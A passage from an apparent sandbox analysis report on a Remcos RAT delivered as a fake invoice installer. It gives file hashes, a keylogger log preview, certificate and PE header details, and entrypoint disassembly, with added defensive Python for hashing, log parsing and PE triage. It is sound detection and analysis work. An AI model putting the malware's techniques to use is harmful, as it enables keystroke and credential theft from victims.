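HIGH_ENTROPY_THRESHOLD = 7.5


def shannon_entropy_8bit(data: bytes) -> float:
    """Shannon entropy over the 256-symbol byte alphabet, in bits per byte.

    Ranges from 0.0 (a single repeated byte value) to 8.0 (all 256 values
    equally frequent); this is the quantity the 'Entropy (8bit)' field reports.
    """
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def file_record(data: bytes) -> dict:
    """Build a dict carrying the same fields the dropped-file records list."""
    entropy = shannon_entropy_8bit(data)
    return {
        "size": len(data),
        "entropy": entropy,
        "md5": hashlib.md5(data).hexdigest().upper(),
        "sha1": hashlib.sha1(data).hexdigest().upper(),
        "sha256": hashlib.sha256(data).hexdigest().upper(),
        "sha512": hashlib.sha512(data).hexdigest().upper(),
        "high_entropy": entropy >= HIGH_ENTROPY_THRESHOLD,
    }


def matches_known(record: dict, known: set = KNOWN_SHA256) -> bool:
    """True when the record's SHA-256 is one of the report's dropped files."""
    return record["sha256"] in known


if __name__ == "__main__":
    # Constructed inputs standing in for files recovered from a host.
    samples = [
        ("all-same", b"A" * 1024),
        ("uniform", bytes(range(256)) * 4),
        ("text", b"The quick brown fox jumps over the lazy dog. " * 20),
    ]
    for label, blob in samples:
        rec = file_record(blob)
        print(f"{label:8} size={rec['size']:5} entropy={rec['entropy']:.3f} "
              f"high_entropy={rec['high_entropy']} known={matches_known(rec)} "
              f"sha256={rec['sha256'][:16]}...")
```

To check a real file, read it with `open(path, "rb").read()` and pass the bytes to `file_record`; the uppercase hex output matches the case used in the report, so values can be compared directly against the records above.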
Process:C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe
File Type:data
Category:dropped
Size (bytes):29189
Entropy (8bit):4.945454516062807
Encrypted:false
SSDEEP:768:1ojOYOF4MsLp5sO5pkv1esokFzIsCuVyFMydx:1oiYCG5sO5pohobFFM4x
MD5:CD3BA17103577BDFD416767D3BDDE150
SHA1:816C9D16226C19ED40D84CE5A797EA813ED66AF0
SHA-256:847D59B3FB55AEBA320DCEEACB7E10F980DBCB0F9141B44CF71D47BB910581CE
SHA-512:C0A29AD1783442E1020F40F92A1E7D81A328F2ABBB0968B735309EF97C1BE93A1BAABA69A1057FF54F68EF9B6C356D8227463A1DF74A2474984BE629136EB38F
Malicious:false
Process:C:\Program Files (x86)\Windows Mail\wab.exe
File Type:JSON data
Category:dropped
Size (bytes):958
Entropy (8bit):5.008577355703137
Encrypted:false
SSDEEP:12:tkECnd6UGkMyGWKyMPVGADTogmayHnmGcArpv/mOAaNO+ao9W7iN5zzkw7Lpm9J7:qNdVauKyM8fvXhNlT3/7SxDWro
MD5:DB0D0EA888098BDE439EC884726D3F1D
SHA1:C0BFF52E1ED25232E2BDECB8BB899EBB06F50372
SHA-256:860B8A39E3466699C50AF0A08BEE2945923344D56906585EDDA9E55FE0020B75
SHA-512:3DF7E59DD131E97E0773BA18F11A0F20F965D77CE31D13DCC0FEC99A0D9DCD40276635AFC3EED181F7FC7BADC9A63A28A30F0465486AC7673F3F81695E9FC4E2
Malicious:false
Preview:{. "geoplugin_request":"102.129.153.223",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite data created by MaxMind, available from <a href='http:\/\/www.maxmind.com'>http:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Miami",. "geoplugin_region":"Florida",. "geoplugin_regionCode":"FL",. "geoplugin_regionName":"Florida",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"528",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"25.7689",. "geoplugin_longitude":"-80.1946",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
Process:C:\Program Files (x86)\Windows Mail\wab.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:dropped
Size (bytes):1091672
Entropy (8bit):7.182329229415893
Encrypted:false
SSDEEP:12288:Ec0xoWbGGh7p/pMSC8grbTQJy4Uwjh5orvRNDRDVu4YT9vZTWbay6spuxv:Ec0xoWNh7pnd6Pey4dXor3D+DWK/v
MD5:195787F942427352DB785FEA42C93F43
SHA1:11349F0AA5059663C99BDDB4B1D4925B0795D4C0
SHA-256:4957FB0FAA66FA85BD02E198C98D741A6EDF5F683538601BBC7099F88AA4AC30
SHA-512:B12DF24DFF447CEC94123248D5D3B9619F7A2D4EBBF21EE42B8BEEDCEA471D9D6B92DDD0E580E29E506B472E8670F6F430DFAA4959E479EA82B9E269FF694AE4
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Program Files (x86)\Windows Mail\wab.exe
File Type:Extensible storage engine DataBase, version 0x620, checksum 0xb549b277, page size 32768, DirtyShutdown, Windows version 10.0
Category:dropped
Size (bytes):41943040
Entropy (8bit):1.3203849010710336
Encrypted:false
SSDEEP:24576:wPzACerDZp9643tPAfY9MkrvUXaYLwumVzPDQgGEqg9joAag/JF7svghu2w0lfoC:prDZpdSfY9lgiPDQgGWXu2
MD5:69B0753047EA2B40463C2E6BA11F08B2
SHA1:BA5DCB99027D79444BC8D7064811E17364CFFE6E
SHA-256:06C2306A5B8D180969FD2F66C689A75126F57E519DD77852AEC73A21478886AC
SHA-512:5AEE6D11CB52473098CC9A07DC0B966CE8CFB396C391FD744FA4A74EC27E46D403DACC71F401A7E8FFE49C1FF2AF1059D4A0BAAA690734A357FD76582AF5BA86
Malicious:false
Process:C:\Program Files (x86)\Windows Mail\wab.exe
File Type:Unicode text, UTF-16, little-endian text, with no line terminators
Category:dropped
Size (bytes):2
Entropy (8bit):1.0
Encrypted:false
SSDEEP:3:Qn:Qn
MD5:F3B25701FE362EC84616A93A45CE9998
SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious:false
Preview:..
Process:C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):11776
Entropy (8bit):5.890541747176257
Encrypted:false
SSDEEP:192:X24sihno0bW+l97H4GB7QDs91kMtwtobTr4u+QHbazMNHT7dmNIEr:m8vJl97JeoxtN/r3z7YV
MD5:75ED96254FBF894E42058062B4B4F0D1
SHA1:996503F1383B49021EB3427BC28D13B5BBD11977
SHA-256:A632D74332B3F08F834C732A103DAFEB09A540823A2217CA7F49159755E8F1D7
SHA-512:58174896DB81D481947B8745DAFE3A02C150F3938BB4543256E8CCE1145154E016D481DF9FE68DAC6D48407C62CBE20753320EBD5FE5E84806D07CE78E0EB0C4
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 3%
Joe Sandbox View:
• Filename: LATG_HWWYTYRERWRWR39670034Kvstelsernes.exe, Detection: malicious
• Filename: LATG_HWWYTYRERWRWR39670034Kvstelsernes.exe, Detection: malicious
• Filename: SecuriteInfo.com.Win32.Malware-gen.10191.7591.exe, Detection: malicious
• Filename: SecuriteInfo.com.Win32.Malware-gen.10191.7591.exe, Detection: malicious
• Filename: ZH-SA_5012023.exe, Detection: malicious
• Filename: ZH-SA_5012023.exe, Detection: malicious
• Filename: SirtakiQuote No 104-346.exe, Detection: malicious
• Filename: 2023.10.11.59363PR69186_1.exe, Detection: malicious
• Filename: 2023.10.11.59363PR69186_1.exe, Detection: malicious
• Filename: CMR_PL7858345353_1_FB-LK_1025_WDF44770313563801.exe, Detection: malicious
• Filename: CMR_PL7858345353_1_FB-LK_1025_WDF44770313563801.exe, Detection: malicious
• Filename: SirtakiQuote_No_104-346.exe, Detection: malicious
• Filename: SirtakiQuote_No_104-346.exe, Detection: malicious
• Filename: 000299288171.exe, Detection: malicious
• Filename: 000299288171.exe, Detection: malicious
• Filename: BR1498-23.exe, Detection: malicious
• Filename: BR1498-23.exe, Detection: malicious
• Filename: vxJjLEvhQU.exe, Detection: malicious
• Filename: SYZMMfgqPs.exe, Detection: malicious
Process:C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe
File Type:data
Category:dropped
Size (bytes):973779
Entropy (8bit):5.927333930668618
Encrypted:false
SSDEEP:12288:Wevg8/6UBWFzUG3Vhy20DfInqInHitcVFeVZE5eEqmWQO32kVeQf8k3Fgs5r/cBd:lwVgrDoJBHeMOQmf5XV8oKcEz
MD5:8019DF65EECA9EF545AA6BB362A06661
SHA1:0E07BF06FD7C2B7AF9B44D9229859BE434496513
SHA-256:AECE698E2E4DB708DE27094B2B63B51C31CDD4A113FE87760AFA0D25E5EF74EF
SHA-512:9757AB44237B40E28538E8E0D33C0467D0FD83E69CEF29E9371640EBE5FE81CEBD04E4220E40F3ABEDD8969EC3BA57F00042537860FC1EC859ED3687E91944DC
Malicious:false
                                                                                                                                                                                                                    Preview:.1......,.......,.......D................0.......1......................................................................................s...................................................................................................................................................G...J...........L...h...............................................................g...............................................................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Program Files (x86)\Windows Mail\wab.exe
File Type: data
Category: dropped
Size (bytes): 416
Entropy (8bit): 3.4077018216873105
Encrypted: false
SSDEEP: 12:KlrlxkuecmlrlxkJAbWFe5ElrlxkD8lrlxkObWItN25MMl:+36cS3hWqM3B3RWIt/Ml
MD5: 75CC3535E18C38DFAD07C94305583855
SHA1: E254844EDC32CAFE2C4A70C6337B35261D52BA3A
SHA-256: 34A21B6CF5538C73DBC52605C36D15C791D8D2EB04572835E09629D3B2457CF3
SHA-512: C83D442A518A0829F7E17512F994F4629DD0C75FC893FDC2206B15D69A5F2802B1B852F884B5B8C435F5090CB38C3AC39ADAB6031E3E62146BD4E897BCC61273
Malicious: true
Yara Hits:
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Roaming\paqlgkfs.dat, Author: Joe Security
Preview: ....[.2.0.2.3./.1.0./.3.1. .1.3.:.1.9.:.5.9. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.2.0.2.3./.1.0./.3.1. .1.3.:.1.9.:.5.9. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.2.0.2.3./.1.0./.3.1. .1.3.:.2.0.:.0.1. .R.u.n.].........[.2.0.2.3./.1.0./.3.1. .1.3.:.2.0.:.0.6. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........{. .U.s.e.r. .h.a.s. .b.e.e.n. .i.d.l.e. .f.o.r. .0. .m.i.n.u.t.e.s. .}.....
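The 416-byte paqlgkfs.dat entry above is the Remcos offline keylogger log. Its preview is UTF-16LE text (every other byte is a NUL, rendered as a dot): one `[YYYY/MM/DD HH:MM:SS Window Title]` record per foreground-window change, the captured keystrokes on the lines beneath it (`[Win]r` here, i.e. the Run dialog being opened), and a closing `{ User has been idle for N minutes }` marker. Note the writing process: wab.exe, not the sample, which is where the Remcos stage is running. The following is an added example, not Joe Sandbox's or Remcos's code, that decodes such a log and splits it into per-window records so the captured input can be reviewed. SAMPLE_LOG is constructed from the preview text and is not the exact bytes of the dropped file; the regexes assume the record layout visible in that preview.

```python
"""Parse a Remcos offline keylogger log like the paqlgkfs.dat artifact above.

Added example, not Joe Sandbox code. SAMPLE_LOG is constructed from the report's
preview (UTF-16LE text, CRLF line ends); it is not the dropped file's exact bytes.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Constructed from the preview; assumption: CRLF separators and no BOM.
SAMPLE_LOG = (
    "\r\n"
    "[2023/10/31 13:19:59 Offline Keylogger Started]\r\n\r\n"
    "[2023/10/31 13:19:59 Program Manager]\r\n"
    "[Win]r\r\n"
    "[2023/10/31 13:20:01 Run]\r\n\r\n"
    "[2023/10/31 13:20:06 Program Manager]\r\n\r\n"
    "{ User has been idle for 0 minutes }\r\n"
).encode("utf-16-le")

START_MARKER = "Offline Keylogger Started"
WINDOW_RE = re.compile(r"^\[(\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}) (.*)\]$")
IDLE_RE = re.compile(r"^\{ User has been idle for (\d+) minutes \}$")


@dataclass
class WindowRecord:
    timestamp: str          # as written by the keylogger: YYYY/MM/DD HH:MM:SS
    title: str              # foreground window title at that moment
    keystrokes: List[str] = field(default_factory=list)


def decode_wide(raw: bytes) -> str:
    """The log is wide-char text; accept it with or without a UTF-16LE BOM."""
    if raw.startswith(b"\xff\xfe"):
        raw = raw[2:]
    return raw.decode("utf-16-le", errors="replace")


def is_remcos_offline_log(raw: bytes) -> bool:
    """Cheap triage check on the marker string seen at the head of this log."""
    return START_MARKER in decode_wide(raw)


def parse_remcos_log(raw: bytes) -> Tuple[List[WindowRecord], Optional[int]]:
    """Split the log into window records; any line that is neither a window
    header nor the idle marker is treated as captured input for the current window."""
    records: List[WindowRecord] = []
    idle_minutes: Optional[int] = None
    for line in decode_wide(raw).splitlines():
        if not line.strip():
            continue
        m = WINDOW_RE.match(line)
        if m:
            records.append(WindowRecord(m.group(1), m.group(2)))
            continue
        m = IDLE_RE.match(line)
        if m:
            idle_minutes = int(m.group(1))
            continue
        if records:
            records[-1].keystrokes.append(line)
    return records, idle_minutes


def typed_per_window(raw: bytes) -> List[Tuple[str, str, str]]:
    """Flatten to (timestamp, title, typed text), keeping only windows with input."""
    records, _ = parse_remcos_log(raw)
    return [(r.timestamp, r.title, "".join(r.keystrokes)) for r in records if r.keystrokes]


if __name__ == "__main__":
    print("remcos offline log:", is_remcos_offline_log(SAMPLE_LOG))
    recs, idle = parse_remcos_log(SAMPLE_LOG)
    for r in recs:
        print(r.timestamp, repr(r.title), "".join(r.keystrokes))
    print("idle minutes:", idle)
```

On a real incident the same parser runs over the file recovered from `%AppData%`; the only field that needs care is the timestamp, which is the victim machine's local clock as the keylogger saw it, so correlate it with the sandbox or host timezone before lining it up with other telemetry.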
File type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit): 7.182329229415893
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: 18001787_down_payment_invoice_90002104.exe
File size: 1'091'672 bytes
MD5: 195787f942427352db785fea42c93f43
SHA1: 11349f0aa5059663c99bddb4b1d4925b0795d4c0
SHA256: 4957fb0faa66fa85bd02e198c98d741a6edf5f683538601bbc7099f88aa4ac30
SHA512: b12df24dff447cec94123248d5d3b9619f7a2d4ebbf21ee42b8beedcea471d9d6b92ddd0e580e29e506b472e8670f6f430dfaa4959e479ea82b9e269ff694ae4
SSDEEP: 12288:Ec0xoWbGGh7p/pMSC8grbTQJy4Uwjh5orvRNDRDVu4YT9vZTWbay6spuxv:Ec0xoWNh7pnd6Pey4dXor3D+DWK/v
TLSH: 71350880E2049A66ECC71FB3D83BDC725427BE6C4978871D255F772A1AF334610BAE49
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...5.oZ.................f...*.....
Icon Hash: 327393a3b595a3a1
Entrypoint: 0x4034a5
Entrypoint Section: .text
Digitally signed: true
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x5A6FED35 [Tue Jan 30 03:57:41 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 1f23f452093b5c1ff091a2f9fb4fa3e9
Signature Valid: false
Signature Issuer: E=Emphatical@Unensouled.To, OU="Synoviparous Industriministeriet ", O=Pothooks, L=Correll, S=Minnesota, C=US
Signature Validation Error: A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number: -2146762487
Not Before, Not After:
• 09/05/2023 08:00:43, 08/05/2026 08:00:43
Subject Chain:
• E=Emphatical@Unensouled.To, OU="Synoviparous Industriministeriet ", O=Pothooks, L=Correll, S=Minnesota, C=US
Version: 3
Thumbprint MD5: 98D4FC1058B808ACA6046A03B4DE85BF
Thumbprint SHA-1: 7BB3BCF15AF20DFC1C555C628764E94B289BF5F4
Thumbprint SHA-256: AD53F62DFFB399583ECB4422D32EE85F8A7AAE21B0ACB35BF1E35EDABF62F3F0
Serial: 47D6D5313599E408790BB633E75A84AAC3D3E43F
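Two points in the static block above deserve a second look when reading this kind of report. `Digitally signed: true` records only that the PE's Security data directory points at an Authenticode blob; the rest of the block (`Signature Valid: false`, an issuer identical to the subject chain, a chain ending in a root the trust provider does not know, and nonsense organisation strings) describes a self-signed certificate and gives no evidence of a publisher. Separately, the link-time stamp 0x5A6FED35 (January 2018) predates the certificate's 2023 validity start by more than five years, which is consistent with a prebuilt NSIS installer stub being reused rather than a fresh compile; the installer's payload is what matters, not the stub's build date. The following is an added example, not Joe Sandbox's code, that parses a PE32 header to recover exactly the fields listed above (machine, section count, timestamp, entrypoint, both characteristics sets, subsystem, OS version, presence of a signature blob) and computes the 8-bit entropy figure. The header bytes are constructed to carry the reported values and are not the sample's real bytes; the security directory RVA and size in the constructed header are placeholders.

```python
"""Static PE32 header triage: decode the fields the report lists above.

Added example, not Joe Sandbox code. build_sample_header() constructs a header
carrying the reported values; it is not the sample's real bytes.
"""
import math
import struct
from collections import Counter
from datetime import datetime, timezone

# IMAGE_FILE_HEADER.Characteristics bits (winnt.h)
FILE_CHARACTERISTICS = {
    0x0001: "RELOCS_STRIPPED",
    0x0002: "EXECUTABLE_IMAGE",
    0x0004: "LINE_NUMS_STRIPPED",
    0x0008: "LOCAL_SYMS_STRIPPED",
    0x0020: "LARGE_ADDRESS_AWARE",
    0x0100: "32BIT_MACHINE",
    0x2000: "DLL",
}
# IMAGE_OPTIONAL_HEADER.DllCharacteristics bits (winnt.h)
DLL_CHARACTERISTICS = {
    0x0040: "DYNAMIC_BASE",
    0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT",
    0x0400: "NO_SEH",
    0x1000: "APPCONTAINER",
    0x4000: "GUARD_CF",
    0x8000: "TERMINAL_SERVER_AWARE",
}
SUBSYSTEMS = {2: "windows gui", 3: "windows cui"}
IMAGE_DIRECTORY_ENTRY_SECURITY = 4  # Authenticode certificate table


def decode_flags(value: int, table: dict) -> list:
    return sorted(name for bit, name in table.items() if value & bit)


def shannon_entropy(data: bytes) -> float:
    """Bits per byte, the report's 'Entropy (8bit)'; packed/encrypted data sits near 8.0."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def parse_pe32(data: bytes) -> dict:
    """Walk DOS header -> NT signature -> file header -> PE32 optional header.
    PE32+ (64-bit) has different optional-header offsets and is rejected here."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    fh = e_lfanew + 4                                   # IMAGE_FILE_HEADER, 20 bytes
    machine, nsections, stamp, _, _, _, chars = struct.unpack_from("<HHIIIHH", data, fh)
    oh = fh + 20                                        # IMAGE_OPTIONAL_HEADER32
    if struct.unpack_from("<H", data, oh)[0] != 0x10B:
        raise ValueError("not a PE32 optional header")
    entry_rva = struct.unpack_from("<I", data, oh + 16)[0]
    image_base = struct.unpack_from("<I", data, oh + 28)[0]
    os_major, os_minor = struct.unpack_from("<HH", data, oh + 40)
    subsystem, dll_chars = struct.unpack_from("<HH", data, oh + 68)
    # A non-zero security directory is all that "Digitally signed: true" means;
    # validity and trust are decided later, when the chain is checked.
    sec_off = oh + 96 + IMAGE_DIRECTORY_ENTRY_SECURITY * 8
    _, sec_size = struct.unpack_from("<II", data, sec_off)
    return {
        "machine": hex(machine),
        "sections": nsections,
        "timestamp": datetime.fromtimestamp(stamp, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC"),
        "entrypoint": image_base + entry_rva,
        "file_characteristics": decode_flags(chars, FILE_CHARACTERISTICS),
        "dll_characteristics": decode_flags(dll_chars, DLL_CHARACTERISTICS),
        "subsystem": SUBSYSTEMS.get(subsystem, hex(subsystem)),
        "os_version": f"{os_major}.{os_minor}",
        "authenticode_present": sec_size > 0,
    }


def build_sample_header() -> bytes:
    """Constructed header with the report's values (machine, 5 sections, stamp,
    entrypoint, image base, OS version 4.0, flags). Security RVA/size are placeholders."""
    dos = bytearray(0x80)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x80)                  # e_lfanew
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 5, 0x5A6FED35, 0, 0, 224, 0x010F)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                     # PE32 magic
    struct.pack_into("<I", opt, 16, 0x34A5)                   # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, 0x400000)                 # ImageBase
    struct.pack_into("<HH", opt, 40, 4, 0)                    # OS version 4.0
    struct.pack_into("<HH", opt, 68, 2, 0x8540)               # WINDOWS_GUI, DllCharacteristics
    struct.pack_into("<I", opt, 92, 16)                       # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + IMAGE_DIRECTORY_ENTRY_SECURITY * 8, 0x10A000, 0x1C58)
    return bytes(dos) + b"PE\0\0" + file_hdr + bytes(opt)


if __name__ == "__main__":
    for key, value in parse_pe32(build_sample_header()).items():
        print(f"{key}: {value}")
    print(f"entropy of a zero page: {shannon_entropy(bytes(4096)):.3f}")
```

Run `parse_pe32(open(path, "rb").read())` on a real sample to get the same fields; `shannon_entropy` on the whole file reproduces the report's figure, and running it per section is the quicker way to find where the packed payload sits.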
Instruction (disassembly at the entrypoint):
sub esp, 000002D4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+14h], ebx
mov dword ptr [esp+10h], 0040A230h
mov dword ptr [esp+1Ch], ebx
call dword ptr [004080ACh]
call dword ptr [004080A8h]
and eax, BFFFFFFFh
cmp ax, 00000006h
mov dword ptr [0042A24Ch], eax
je 00007F7BFCA7CB13h
push ebx
call 00007F7BFCA7FDDDh
cmp eax, ebx
je 00007F7BFCA7CB09h
push 00000C00h
call eax
mov esi, 004082B0h
push esi
call 00007F7BFCA7FD57h
push esi
call dword ptr [00408150h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], 00000000h
jne 00007F7BFCA7CAECh
push 0000000Ah
call 00007F7BFCA7FDB0h
push 00000008h
call 00007F7BFCA7FDA9h
push 00000006h
mov dword ptr [0042A244h], eax
call 00007F7BFCA7FD9Dh
cmp eax, ebx
je 00007F7BFCA7CB11h
push 0000001Eh
call eax
test eax, eax
je 00007F7BFCA7CB09h
or byte ptr [0042A24Fh], 00000040h
push ebp
call dword ptr [00408044h]
push ebx
call dword ptr [004082A0h]
mov dword ptr [0042A318h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 000002B4h
push eax
push ebx
push 004216E8h
call dword ptr [00408188h]
push 0040A384h
Programming Language:
• [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x84fc | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x4f000 | 0x5df70 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x108628 | 0x2230 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x6409 | 0x6600 | False | 0.6540287990196079 | data | 6.416222666400958 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x138e | 0x1400 | False | 0.45 | data | 5.143831732151552 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xa000 | 0x20358 | 0x600 | False | 0.5026041666666666 | data | 4.004402321344153 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x2b000 | 0x24000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x4f000 | 0x5df70 | 0x5e000 | False | 0.04252462184175532 | data | 4.065325004462114 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_BITMAP | 0x4f460 | 0x368 | Device independent bitmap graphic, 96 x 16 x 4, image size 768 | English | United States | 0.23623853211009174
RT_ICON | 0x4f7c8 | 0x42028 | Device independent bitmap graphic, 256 x 512 x 32, image size 270336 | English | United States | 0.023585673284611062
RT_ICON | 0x917f0 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States | 0.04118360345439489
RT_ICON | 0xa2018 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.07894426074633916
RT_ICON | 0xa6240 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.10300829875518672
RT_ICON | 0xa87e8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.1425891181988743
RT_ICON | 0xa9890 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.27158848614072495
RT_ICON | 0xaa738 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.17418032786885246
RT_ICON | 0xab0c0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.29196750902527074
RT_ICON | 0xab968 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.2254335260115607
RT_ICON | 0xabed0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.24379432624113476
RT_DIALOG | 0xac338 | 0x144 | data | English | United States | 0.5216049382716049
RT_DIALOG | 0xac480 | 0x13c | data | English | United States | 0.5506329113924051
RT_DIALOG | 0xac5c0 | 0x120 | data | English | United States | 0.5173611111111112
RT_DIALOG | 0xac6e0 | 0x11c | data | English | United States | 0.6091549295774648
RT_DIALOG | 0xac800 | 0xc4 | data | English | United States | 0.5918367346938775
RT_DIALOG | 0xac8c8 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0xac928 | 0x92 | data | English | United States | 0.6506849315068494
RT_VERSION | 0xac9c0 | 0x25c | data | English | United States | 0.5149006622516556
RT_MANIFEST | 0xacc20 | 0x34e | XML 1.0 document, ASCII text, with very long lines (846), with no line terminators | English | United States | 0.5141843971631206
DLL | Import
